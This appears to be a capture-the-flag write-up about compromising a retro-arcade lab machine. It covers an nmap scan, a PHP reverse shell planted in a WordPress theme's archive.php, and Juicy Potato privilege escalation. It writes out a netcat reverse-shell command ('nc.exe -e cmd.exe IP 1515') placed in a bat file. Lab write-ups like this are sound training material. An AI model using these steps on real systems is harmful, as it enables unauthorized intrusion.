ghostšŸ‘»sonofabot-sec:~#

I scan, I map, I exploit .... Ghost is in your shell!!!

View on GitHub

Screenshot_20220412_165805

Less chatting more hacking 🤤

Let’s jump right into it

Here were working with a retro arcade, games and all that let’s see what it’s all about …….

Upon firing up the machine we get an IP address

Enumeration

First thing for every good security operative is enumeration so we run an nmap scan to know which ports/services are up and running Screenshot_20220411_182142

We see there’s only two ports running Port 80 and 3389 That’s

Exploitation

We can upload an RCE to wordpress CMS we just have to place it well Your regular pentest monkey rev-shell won’t work (didn’t work for me) So let’s go for Rev-shell 2.5 Screenshot_20220411_191305 LINK TO THE REV Replace the archive.php file Screenshot_20220411_221725

Screenshot_20220411_191216(1) We’re in šŸ˜Ž

Seeing SeImpersonate…. is Enabled we can use Juicy Potato for PrivEsc

Screenshot_20220411_213845 So yh everthing seems good So now we create a bat file ā€œecho C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe Ā IP 1515 > reverse.batā€ Screenshot_20220411_220833 Running ā€œwmic Service get name,displayname,pathname,startmodeā€ gives us a list of running services Choosing a CLISD Juicy Potato CLISD

Start a netcat listener in a new tab on your machine with the port in the bat file Screenshot_20220411_220833

Screenshot_20220411_220856

AND WE ARE DONE

LOOK FOR FILES ON YOUR OWN, it’s your little task

Hit me up on Twitter if you run into any issues



Back To Home